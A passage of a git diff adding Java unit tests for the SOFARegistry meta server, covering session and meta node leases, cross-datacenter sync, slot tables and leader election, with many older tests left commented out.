MetaNode(randomURL(randomIp()), getDc()); + // manager.renew(node, 10); + // waitConditionUntilTimeOut(()->manager.getLease(node) != null, 1000); + // Assert.assertEquals(node, manager.getLease(node).getRenewal()); + // Assert.assertFalse(manager.getLease(node).isExpired()); + // Assert.assertTrue(manager.getClusterMembers().size() > size); + // manager.cancel(manager.getLease(node).prepareCancel()); + // waitConditionUntilTimeOut(()->manager.getClusterMembers().size() == size, + // 1000); + // Assert.assertEquals(size, manager.getClusterMembers().size()); + // } + // + // @Test + // public void testRaftBatchInsert() throws Exception { + // leaderNotify.set(false); + // int tasks = 100; + // CyclicBarrier barrier = new CyclicBarrier(tasks / 10); + // CountDownLatch latch = new CountDownLatch(tasks); + // for (int i = 0; i < tasks; i++) { + // executors.execute(new Runnable() { + // @Override + // public void run() { + // try { + // barrier.await(); + // } catch (Exception ignore) { + // } + // manager.renew(new MetaNode(randomURL(randomIp()), getDc()), 10); + // latch.countDown(); + // } + // }); + // } + // logger.info("[count] {}", latch.getCount()); + // TimeUnit.MILLISECONDS.sleep(1000); + // logger.info("[count] {}", latch.getCount()); + // latch.await(3, TimeUnit.SECONDS); + // Assert.assertEquals(tasks, manager.getClusterMembers().size()); + // } + // + // @Test + // public void testRegister() { + // manager.renew(new MetaNode(randomURL(randomIp()), getDc()), 10); + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // Lease lease = + // manager.getLease(manager.getClusterMembers().get(0)); + // Assert.assertFalse(lease.isExpired()); + // } + // + // @Test(expected = UnsupportedOperationException.class) + // public void testDirectRegister() { + // manager.register(new Lease(new MetaNode(randomURL(), getDc()), + // 1)); + // } + // + // @Test + // public void testGetEpoch() throws TimeoutException, InterruptedException + // { + // raftLeaseManager.set(spy(new + // AbstractCachablePersistenceLeaseManager<>(snapshotFile))); + // leaderNotify.set(true); + // manager.getEpoch(); + // verify(raftLeaseManager.get(), never()).getEpoch(); + // + // leaderNotify.set(false); + // manager.getEpoch(); + // verify(raftLeaseManager.get(), times(1)).getEpoch(); + // } + // + // @Test + // public void testCancel() { + // MetaNode node = new MetaNode(randomURL(randomIp()), getDc()); + // manager.renew(node, 10); + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // manager.cancel(manager.getLease(node).prepareCancel()); + // Assert.assertEquals(0, manager.getClusterMembers().size()); + // } + // + // @Test + // public void testRenew() throws InterruptedException { + // MetaNode node = new MetaNode(randomURL(randomIp()), getDc()); + // manager.renew(node, 1); + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // Lease lease = manager.getLease(node); + // long prevLastUpdateTime = lease.getLastUpdateTimestamp(); + // long prevBeginTime = lease.getBeginTimestamp(); + // // let time pass, so last update time could be diff + // Thread.sleep(5); + // manager.renew(node, 10); + // lease = manager.getLease(node); + // Assert.assertEquals(prevBeginTime, lease.getBeginTimestamp()); + // Assert.assertNotEquals(prevLastUpdateTime, + // lease.getLastUpdateTimestamp()); + // } + // + // @Test + // public void testEvict() throws InterruptedException { + // MetaNode node = new MetaNode(randomURL(randomIp()), getDc()); + // manager.renew(node, 1); + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // TimeUnit.SECONDS.sleep(1); + // TimeUnit.MILLISECONDS.sleep(100); + // manager.evict(); + // Assert.assertEquals(0, manager.getClusterMembers().size()); + // } + // + // @Test + // public void testEvictTooQuick() throws InterruptedException { + // manager = spy(manager); + // evitTimeMilli.set(3000); + // MetaNode node = new MetaNode(randomURL(randomIp()), getDc()); + // manager.renew(node, 1); + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // manager.evict(); + // manager.evict(); + // manager.evict(); + // verify(localLeaseManager, times(1)).getExpiredLeases(); + // } + // + // @Test + // public void testEvitTooQuickThreadSafe() throws InterruptedException { + // manager = spy(manager); + // evitTimeMilli.set(1000); + // MetaNode node = new MetaNode(randomURL(randomIp()), getDc()); + // manager.renew(node, 1); + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // int tasks = 100; + // CyclicBarrier barrier = new CyclicBarrier(tasks); + // CountDownLatch latch = new CountDownLatch(tasks); + // for (int i = 0; i < tasks; i++) { + // executors.execute(new Runnable() { + // @Override + // public void run() { + // try { + // barrier.await(); + // } catch (Exception ignore) { + // } + // manager.evict(); + // latch.countDown(); + // } + // }); + // } + // latch.await(); + // verify(localLeaseManager, times(1)).getExpiredLeases(); + // } + // + // @Test + // public void testEvictConcurrentModificateWithRenew() { + // MetaNode node = new MetaNode(randomURL(randomIp()), getDc()); + // manager.renew(node, 10); + // verify(localLeaseManager, times(1)).getLease(node); + // + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // when(localLeaseManager.getExpiredLeases()).thenReturn( + // Lists.newArrayList(new Lease(node, 1000))); + // manager.evict(); + // verify(localLeaseManager, times(2)).getLease(node); + // Assert.assertEquals(1, manager.getClusterMembers().size()); + // } + +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/session/DefaultSessionServerManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/session/DefaultSessionServerManagerTest.java new file mode 100644 index 000000000..cc5ebbd8a --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/session/DefaultSessionServerManagerTest.java @@ -0,0 +1,158 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.session; + +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import java.util.List; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class DefaultSessionServerManagerTest extends AbstractMetaServerTestBase { + + private DefaultSessionServerManager sessionManager; + + @Mock private MetaServerConfig metaServerConfig; + + private SlotManager slotManager = new SimpleSlotManager(); + + @Before + public void beforeDefaultSessionManagerTest() throws Exception { + MockitoAnnotations.initMocks(this); + makeMetaLeader(); + sessionManager = + new DefaultSessionServerManager(metaServerConfig, slotManager, metaLeaderService); + when(metaServerConfig.getExpireCheckIntervalMillis()).thenReturn(60); + } + + @After + public void afterDefaultSessionManagerTest() throws Exception { + sessionManager.preDestory(); + } + + @Test + public void testGetEpoch() throws TimeoutException, InterruptedException { + Assert.assertEquals(0, sessionManager.getEpoch()); + sessionManager.renew( + new SessionNode(randomURL(randomIp()), getDc(), ServerEnv.PROCESS_ID), 1000); + waitConditionUntilTimeOut(() -> sessionManager.getEpoch() > 0, 100); + Assert.assertNotEquals(0, sessionManager.getEpoch()); + } + + @Test + public void testGetClusterMembers() { + Assert.assertTrue(sessionManager.getSessionServerMetaInfo().getClusterMembers().isEmpty()); + } + + @Test + public void testRenew() throws Exception { + sessionManager.postConstruct(); + String ip = randomIp(); + long timestamp = System.currentTimeMillis(); + SessionNode sessionNode = + new SessionNode(randomURL(ip), getDc(), new ProcessId(ip, timestamp, 1, random.nextInt())); + NotifyObserversCounter counter = new NotifyObserversCounter(); + sessionManager.addObserver(counter); + + makeMetaLeader(); + + sessionManager.renew(sessionNode, 1); + // verify(leaseManager, times(1)).register(any()); + Assert.assertEquals(1, counter.getCounter()); + + sessionManager.renew(sessionNode, 1); + // verify(leaseManager, times(1)).register(any()); + Assert.assertEquals(1, counter.getCounter()); + + SessionNode sessionNode2 = + new SessionNode( + sessionNode.getNodeUrl(), + getDc(), + new ProcessId(sessionNode.getIp(), timestamp, 2, random.nextInt())); + Assert.assertFalse(sessionManager.renew(sessionNode2, 1)); + Assert.assertEquals(2, counter.getCounter()); + } + + @Test + public void testSessionServerManagerRefreshEpochOnlyOnceWhenNewRegistered() + throws TimeoutException, InterruptedException { + makeMetaLeader(); + SessionNode node = new SessionNode(randomURL(randomIp()), getDc(), ServerEnv.PROCESS_ID); + sessionManager.renew(node, 1000); + Assert.assertEquals(1, sessionManager.getSessionServerMetaInfo().getClusterMembers().size()); + } + + @Test + public void testCancel() { + List sessionNodes = randomSessionNodes(10); + for (SessionNode sessionNode : sessionNodes) { + sessionManager.renew(sessionNode, 1000); + } + NotifyObserversCounter counter = new NotifyObserversCounter(); + sessionManager.addObserver(counter); + sessionManager.cancel(sessionManager.getLease(sessionNodes.get(1))); + Assert.assertEquals(1, counter.getCounter()); + Assert.assertEquals(9, sessionManager.getSessionServerMetaInfo().getClusterMembers().size()); + } + + protected List randomSessionNodes(int num) { + List result = Lists.newArrayList(); + for (int i = 0; i < num; i++) { + result.add(new SessionNode(randomURL(randomIp()), getDc(), ServerEnv.PROCESS_ID)); + } + return result; + } + + @Test + public void testOnHeartbeat() { + List sessionNodes = randomSessionNodes(2); + for (SessionNode sessionNode : sessionNodes) { + sessionManager.renew(sessionNode, 1000); + } + SessionNode sessionNode = new SessionNode(new URL(randomIp()), getDc(), ServerEnv.PROCESS_ID); + sessionManager.renew(sessionNode, 1000); + SlotTable slotTable = randomSlotTable(); + + Assert.assertEquals(SlotTable.INIT, slotManager.getSlotTable()); + sessionManager.onHeartbeat( + new HeartbeatRequest<>( + sessionNode, + slotTable.getEpoch(), + getDc(), + System.currentTimeMillis(), + SlotConfig.slotBasicInfo()) + .setSlotTable(slotTable)); + Assert.assertNotEquals(SlotTable.INIT, slotManager.getSlotTable()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCrossDcMetaServerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCrossDcMetaServerTest.java new file mode 100644 index 000000000..b59be13d8 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCrossDcMetaServerTest.java @@ -0,0 +1,246 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import java.util.*; + +public class DefaultCrossDcMetaServerTest extends AbstractMetaServerTestBase { + + // private DefaultCrossDcMetaServer server; + // + // @Mock private Exchange exchange; + // + // @Mock private MetaServerConfig metaServerConfig; + // + // @Mock private MetaLeaderService metaLeaderService; + // + // @Before + // public void beforeDefaultCrossDcMetaServerTest() { + // MockitoAnnotations.initMocks(this); + // when(metaServerConfig.getCrossDcMetaSyncIntervalMillis()).thenReturn(60 * 1000); + // Collection collection = Lists.newArrayList("10.0.0.1", "10.0.0.2"); + // server = + // spy( + // new DefaultCrossDcMetaServer( + // getDc(), + // collection, + // scheduled, + // exchange, + // this.metaLeaderService, + // metaServerConfig)); + // } + // + // @After + // public void afterDefaultCrossDcMetaServerTest() throws Exception { + // LifecycleHelper.startIfPossible(server); + // LifecycleHelper.disposeIfPossible(server); + // } + // + // @Test + // public void testDoInitialize() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // Assert.assertTrue(server.getLifecycleState().canStart()); + // } + // + // @Test + // public void testDoStart() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // Assert.assertTrue(server.getLifecycleState().canStop()); + // } + // + // @Test + // public void testDoStop() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // LifecycleHelper.stopIfPossible(server); + // Assert.assertTrue(server.getLifecycleState().canStart()); + // } + // + // @Test + // public void testDoDispose() throws Exception { + // LifecycleHelper.disposeIfPossible(server); + // Assert.assertTrue(server.getLifecycleState().canInitialize()); + // } + // + // @Test + // public void testTestGetDc() { + // Assert.assertEquals(getDc(), server.getDc()); + // } + // + // @Test(expected = IllegalStateException.class) + // public void testGetSlotTable() { + // server.getSlotTable(); + // } + // + // @Test + // public void testRefreshSlotTableWithResult() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // Assert.assertEquals(2, server.getClusterMembers().size()); + // DataCenterNodes message = + // new DataCenterNodes(Node.NodeType.META, System.currentTimeMillis(), getDc()); + // Map nodes = + // ImmutableMap.of( + // "10.0.0.1", + // new MetaNode(randomURL("10.0.0.1"), getDc()), + // "10.0.0.2", + // new MetaNode(randomURL("10.0.0.2"), getDc()), + // "10.0.0.3", + // new MetaNode(randomURL("10.0.0.3"), getDc())); + // message.setNodes(nodes); + // when(exchange.getClient(Exchange.META_SERVER_TYPE)) + // .thenReturn(getRpcClient(scheduled, 1, message)); + // server.doRefresh(0); + // waitConditionUntilTimeOut(() -> server.getClusterMembers().size() > 2, 1000); + // List expected = Lists.newArrayList(message.getNodes().values()); + // expected.sort(new NodeComparator()); + // List actual = server.getClusterMembers(); + // actual.sort(new NodeComparator()); + // Assert.assertEquals(expected, actual); + // } + // + // @Test + // public void testDoRefreshWithFirstTimeout() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // Assert.assertEquals(2, server.getClusterMembers().size()); + // DataCenterNodes message = + // new DataCenterNodes(Node.NodeType.META, System.currentTimeMillis(), getDc()); + // Map nodes = + // ImmutableMap.of( + // "10.0.0.1", + // new MetaNode(randomURL("10.0.0.1"), getDc()), + // "10.0.0.2", + // new MetaNode(randomURL("10.0.0.2"), getDc()), + // "10.0.0.3", + // new MetaNode(randomURL("10.0.0.3"), getDc())); + // message.setNodes(nodes); + // when(exchange.getClient(Exchange.META_SERVER_TYPE)) + // .thenReturn(getRpcClient(scheduled, 3, new TimeoutException("expected timeout"))) + // .thenReturn(getRpcClient(scheduled, 1, message)); + // server.doRefresh(0); + // waitConditionUntilTimeOut(() -> server.getClusterMeta().getClusterMembers().size() > 2, + // 1000); + // List expected = Lists.newArrayList(message.getNodes().values()); + // expected.sort(new NodeComparator()); + // List actual = server.getClusterMembers(); + // actual.sort(new NodeComparator()); + // Assert.assertEquals(expected, actual); + // } + // + // @Test + // public void testDoRefreshWithOverRetryTimes() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // Assert.assertEquals(2, server.getClusterMembers().size()); + // + // when(exchange.getClient(Exchange.META_SERVER_TYPE)) + // .thenReturn(getRpcClient(scheduled, 1, new TimeoutException())); + // server.doRefresh(0); + // Thread.sleep(100); + // verify(server, atLeast(3)).doRefresh(anyInt()); + // } + // + // // run manually + // // @Test + // // @Ignore + // public void testRaftMechanismWorks() throws Exception { + // + // server = + // new DefaultCrossDcMetaServer( + // getDc(), + // Lists.newArrayList(NetUtil.getLocalAddress().getHostAddress()), + // scheduled, + // exchange, + // this.metaLeaderService, + // metaServerConfig); + // DataCenterNodes message = + // new DataCenterNodes(Node.NodeType.META, System.currentTimeMillis(), getDc()); + // Map nodes = + // ImmutableMap.of( + // "10.0.0.1", new MetaNode(randomURL("10.0.0.1"), getDc()), + // "10.0.0.2", new MetaNode(randomURL("10.0.0.2"), getDc()), + // "10.0.0.3", new MetaNode(randomURL("10.0.0.3"), getDc()), + // "10.0.0.4", new MetaNode(randomURL("10.0.0.4"), getDc()), + // "10.0.0.5", new MetaNode(randomURL("10.0.0.5"), getDc())); + // message.setNodes(nodes); + // when(exchange.getClient(Exchange.META_SERVER_TYPE)) + // // .thenReturn(getRpcClient(scheduled, 3, new TimeoutException())) + // .thenReturn(getRpcClient(scheduled, 1, message)); + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // + // server.doRefresh(0); + // waitConditionUntilTimeOut(() -> server.getClusterMembers().size() > 4, 30000); + // List expected = Lists.newArrayList(message.getNodes().values()); + // Collections.sort( + // expected, + // new Comparator() { + // @Override + // public int compare(MetaNode o1, MetaNode o2) { + // return o1.getIp().compareTo(o2.getIp()); + // } + // }); + // List real = server.getClusterMembers(); + // Collections.sort( + // real, + // new Comparator() { + // @Override + // public int compare(MetaNode o1, MetaNode o2) { + // return o1.getIp().compareTo(o2.getIp()); + // } + // }); + // Assert.assertEquals(expected.size(), real.size()); + // // wait for rpc safe quit + // Thread.sleep(100); + // } + // + // @Test + // public void testRefresh() { + // server.refresh(); + // verify(server, never()).doRefresh(anyInt()); + // } + // + // @Test + // public void testGetRefreshCount() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // when(exchange.getClient(Exchange.META_SERVER_TYPE)) + // .thenReturn(getRpcClient(scheduled, 1, new TimeoutException())); + // server.refresh(); + // server.refresh(); + // server.refresh(); + // Assert.assertEquals(3, server.getRefreshCount()); + // } + // + // @Test + // public void testGetLastRefreshTime() {} + // + // @Test + // public void testGetSlotTable2() throws Exception { + // LifecycleHelper.initializeIfPossible(server); + // LifecycleHelper.startIfPossible(server); + // SlotAllocator allocator = mock(SlotAllocator.class); + // server.setAllocator(allocator); + // server.getSlotTable(); + // verify(allocator, atLeast(1)).getSlotTable(); + // } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCurrentDcMetaServerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCurrentDcMetaServerTest.java new file mode 100644 index 000000000..f1272a31b --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCurrentDcMetaServerTest.java @@ -0,0 +1,188 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.ImmutableMap; +import java.util.List; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class DefaultCurrentDcMetaServerTest extends AbstractMetaServerTestBase { + + private DefaultCurrentDcMetaServer metaServer; + + @Mock private SessionServerManager sessionServerManager; + + @Mock private DataServerManager dataServerManager; + + @Mock private SlotManager slotManager; + + @Mock private NodeConfig nodeConfig; + + @Before + public void beforeDefaultCurrentDcMetaServerTest() throws Exception { + MockitoAnnotations.initMocks(this); + metaServer = + new DefaultCurrentDcMetaServer() + .setDataServerManager(dataServerManager) + .setSessionManager(sessionServerManager) + .setNodeConfig(nodeConfig) + .setSlotManager(slotManager); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + when(nodeConfig.getMetaNodeIP()) + .thenReturn( + ImmutableMap.of(getDc(), Lists.newArrayList(randomIp(), randomIp(), randomIp()))); + metaServer.postConstruct(); + } + + @After + public void afterDefaultCurrentDcMetaServerTest() throws Exception { + metaServer.preDestory(); + } + + @Test + public void testGetSessionServers() { + when(sessionServerManager.getSessionServerMetaInfo()) + .thenReturn( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new SessionNode(randomURL(), getDc(), ServerEnv.PROCESS_ID), + new SessionNode(randomURL(), getDc(), ServerEnv.PROCESS_ID)))); + Assert.assertEquals( + 2, + metaServer.getSessionServerManager().getSessionServerMetaInfo().getClusterMembers().size()); + verify(sessionServerManager, times(1)).getSessionServerMetaInfo(); + } + + @Test + public void testUpdateClusterMembers() throws Exception { + + List prevClusterNodes = metaServer.getClusterMembers(); + long prevEpoch = metaServer.getEpoch(); + metaServer.updateClusterMembers( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new MetaNode(randomURL(randomIp()), getDc()), + new MetaNode(randomURL(randomIp()), getDc()), + new MetaNode(randomURL(randomIp()), getDc()), + new MetaNode(randomURL(randomIp()), getDc()), + new MetaNode(randomURL(randomIp()), getDc()), + new MetaNode(randomURL(randomIp()), getDc())))); + long currentEpoch = metaServer.getEpoch(); + // wait for raft communication + Thread.sleep(100); + List currentClusterNodes = metaServer.getClusterMembers(); + + LifecycleHelper.stopIfPossible(metaServer); + LifecycleHelper.disposeIfPossible(metaServer); + + Assert.assertTrue(currentEpoch > prevEpoch); + Assert.assertNotEquals(currentClusterNodes.size(), prevClusterNodes.size()); + } + + @Test + public void testGetClusterMembers() throws TimeoutException, InterruptedException { + makeMetaLeader(); + metaServer.getClusterMembers(); + + makeMetaNonLeader(); + metaServer.getClusterMembers(); + } + + @Test + public void testGetSlotTable() throws TimeoutException, InterruptedException { + when(slotManager.getSlotTable()) + .thenReturn( + new SlotTable( + DatumVersionUtil.nextId(), + Lists.newArrayList(new Slot(1, randomIp(), 2, Lists.newArrayList(randomIp()))))); + + makeMetaLeader(); + SlotTable slotTable = metaServer.getSlotTable(); + verify(slotManager, times(1)).getSlotTable(); + Assert.assertEquals(1, slotTable.getSlotIds().size()); + + makeMetaNonLeader(); + slotTable = metaServer.getSlotTable(); + verify(slotManager, times(2)).getSlotTable(); + Assert.assertEquals(1, slotTable.getSlotIds().size()); + } + + @Test + public void testCancel() throws InterruptedException, TimeoutException { + MetaNode metaNode = new MetaNode(randomURL(), getDc()); + metaServer.renew(metaNode); + + makeMetaLeader(); + metaServer.cancel(metaNode); + metaServer.renew(metaNode); + + makeMetaNonLeader(); + metaServer.cancel(metaNode); + } + + @Test + public void testGetEpoch() throws TimeoutException, InterruptedException { + metaServer.renew(new MetaNode(randomURL(), getDc())); + makeMetaLeader(); + Assert.assertTrue(metaServer.getEpoch() <= DatumVersionUtil.nextId()); + + makeMetaNonLeader(); + metaServer.getEpoch(); + } + + @Test + public void testRenew() { + NotifyObserversCounter notifyCounter = new NotifyObserversCounter(); + metaServer.addObserver(notifyCounter); + MetaNode metaNode = new MetaNode(randomURL(), getDc()); + + metaServer.renew(metaNode); + metaServer.renew(metaNode); + + Assert.assertEquals(2, notifyCounter.getCounter()); + } + + @Test + public void testGetDataManager() { + DataServerManager manager = metaServer.getDataServerManager(); + Assert.assertEquals(dataServerManager, manager); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaLeaderElectorTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaLeaderElectorTest.java new file mode 100644 index 000000000..3c98383e4 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaLeaderElectorTest.java @@ -0,0 +1,151 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.store.api.elector.LeaderElector; +import java.util.concurrent.atomic.AtomicInteger; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class DefaultMetaLeaderElectorTest extends AbstractMetaServerTestBase { + + private DefaultMetaLeaderElector metaLeaderElector; + + @Mock private LeaderElector leaderElector; + + @Mock private MetaServerConfig metaServerConfig; + + @Before + public void beforeDefaultMetaLeaderElectorTest() { + MockitoAnnotations.initMocks(this); + metaLeaderElector = new DefaultMetaLeaderElector(leaderElector, metaServerConfig, null); + when(metaServerConfig.getMetaLeaderWarmupMillis()).thenReturn(200L); + } + + @Test + public void testIsWarmup() throws InterruptedException { + when(metaServerConfig.getMetaLeaderWarmupMillis()).thenReturn(2000L); + when(leaderElector.amILeader()).thenReturn(true); + metaLeaderElector.leaderNotify(); + Assert.assertFalse(metaLeaderElector.isWarmuped()); + when(metaServerConfig.getMetaLeaderWarmupMillis()).thenReturn(1L); + Thread.sleep(30); + Assert.assertTrue(metaLeaderElector.isWarmuped()); + } + + @Test + public void testAmILeader() { + when(leaderElector.amILeader()).thenReturn(true); + Assert.assertTrue(metaLeaderElector.amILeader()); + when(leaderElector.amILeader()).thenReturn(false); + Assert.assertFalse(metaLeaderElector.amILeader()); + } + + @Test + public void testGetLeader() { + when(leaderElector.getLeader()).thenReturn(ServerEnv.IP); + Assert.assertEquals(ServerEnv.IP, metaLeaderElector.getLeader()); + } + + @Test + public void testGetLeaderEpoch() { + when(leaderElector.getLeaderEpoch()).thenReturn(0L); + Assert.assertEquals(0L, metaLeaderElector.getLeaderEpoch()); + } + + @Test + public void testLeaderNotify() { + AtomicInteger leaderCounter = new AtomicInteger(0); + AtomicInteger followerCounter = new AtomicInteger(0); + metaLeaderElector = + new DefaultMetaLeaderElector( + leaderElector, + metaServerConfig, + Lists.newArrayList( + new MetaLeaderService.MetaLeaderElectorListener() { + @Override + public void becomeLeader() { + leaderCounter.incrementAndGet(); + } + + @Override + public void loseLeader() { + followerCounter.incrementAndGet(); + } + })); + metaLeaderElector.leaderNotify(); + Assert.assertEquals(1, leaderCounter.get()); + Assert.assertEquals(0, followerCounter.get()); + for (int i = 0; i < 100; i++) { + metaLeaderElector.leaderNotify(); + } + Assert.assertEquals(1, leaderCounter.get()); + Assert.assertEquals(0, followerCounter.get()); + } + + @Test + public void testFollowNotify() { + AtomicInteger leaderCounter = new AtomicInteger(0); + AtomicInteger followerCounter = new AtomicInteger(0); + metaLeaderElector = + new DefaultMetaLeaderElector( + leaderElector, + metaServerConfig, + Lists.newArrayList( + new MetaLeaderService.MetaLeaderElectorListener() { + @Override + public void becomeLeader() { + leaderCounter.incrementAndGet(); + } + + @Override + public void loseLeader() { + followerCounter.incrementAndGet(); + } + })); + metaLeaderElector.leaderNotify(); + Assert.assertEquals(1, leaderCounter.get()); + Assert.assertEquals(0, followerCounter.get()); + metaLeaderElector.leaderNotify(); + Assert.assertEquals(1, leaderCounter.get()); + Assert.assertEquals(0, followerCounter.get()); + metaLeaderElector.followNotify(); + Assert.assertEquals(1, leaderCounter.get()); + Assert.assertEquals(1, followerCounter.get()); + for (int i = 0; i < 100; i++) { + metaLeaderElector.followNotify(); + } + Assert.assertEquals(1, leaderCounter.get()); + Assert.assertEquals(1, followerCounter.get()); + } + + @Test + public void testRegisterListener() throws Exception { + metaLeaderElector.postConstruct(); + verify(leaderElector, atLeast(1)).registerLeaderAware(metaLeaderElector); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaServerManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaServerManagerTest.java new file mode 100644 index 000000000..60a7682c6 --- 